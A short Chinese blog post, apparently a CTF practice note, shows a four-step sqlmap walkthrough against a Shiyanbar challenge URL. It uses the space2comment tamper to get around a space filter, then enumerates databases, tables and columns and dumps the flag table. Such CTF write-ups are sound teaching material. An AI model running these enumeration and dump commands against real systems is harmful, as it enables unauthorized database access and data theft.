美文网首页CTF练习解析
sqlmap用法

sqlmap用法

作者: 追求科技的足球 | 来源:发表于2019-03-12 21:56 被阅读1次

1、如果是空格过滤,需要两个空格的时候,参数为--tamper=space2comment

实例:实验吧简单的sql注入1、

第一步(查数据库,查当前数据库是--current-db)

sqlmap -u "http://ctf5.shiyanbar.com/423/web/?id=1" --tamper=space2comment --dbs

第二步(已知数据库查表)

sqlmap -u "http://ctf5.shiyanbar.com/423/web/?id=1" --tamper=space2comment -D web1 --tables

第三步(已知表查字段)

sqlmap -u "http://ctf5.shiyanbar.com/423/web/?id=1" --tamper=space2comment -D web1 -T flag --columns

第四步(已知字段查值)

sqlmap -u "http://ctf5.shiyanbar.com/423/web/?id=1" --tamper=space2comment -D web1 -T flag -C flag --dump

太不容易啦哇哇哇

(未完待续)

相关文章

  • SQLmap用法

    SQLMAP作用 判断可注入的参数 判断可以用哪种SQL注入技术来注入 识别出哪种数据库 根据用户选择,读取哪些数...

  • sqlmap用法

    1、如果是空格过滤,需要两个空格的时候,参数为--tamper=space2comment 实例:实验吧简单的sq...

  • SQLmap经典用法

    1、经典用法介绍(经典六步法) 第一步: -u "http://www.example.com" --cookie...

  • SQLmap经典用法(二)

    基础 1:检测注入点是否可用? python sqlmap.py -u “http://www.target....

  • sqlmap使用操作

    安装好sqlmap后,可以用cmd使用sqlmap D: cd sqlmap/sqlmap python sqlm...

  • SQLMAP简介

    SQLMAP介绍 1.什么是SQLMAP? 2.SQLMAP能做什么? 3.SQLMAP目录介绍 什么是SQLMA...

  • 安全测试 sql注入 windows 实战

    1. sqlmap:http://sqlmap.org/[http://sqlmap.org/] 下载压缩包: 解...

  • 【工具使用】常用的SQLMAP命令

    0x01 总结 sqlmap -u 网址sqlmap --dbs 列出所有数据库sqlmap --current-...

  • 在BurpSuite中集成Sqlmap

    配置: 首先安装sqlmap,传送门:http://sqlmap.org/ 将sqlmap.py加入到path中(...

  • 在BurpSuite上安装sqlmap插件

    (1) 到sqlmap官网上下载sqlmap源文件①运行sqlmap需要python环境,而且是python 2....

网友评论

    本文标题:sqlmap用法

    本文链接:https://www.haomeiwen.com/subject/ukeopqtx.html

    延伸阅读

    深度阅读

    • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

    栏目导航

    热点阅读

    CTF练习解析

    关于我们|服务条款|联系我们|sqlmap用法|投稿指南|网站地图|RSS订阅|排版工具|手机版

    提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

    Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

    备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

    本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

    所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!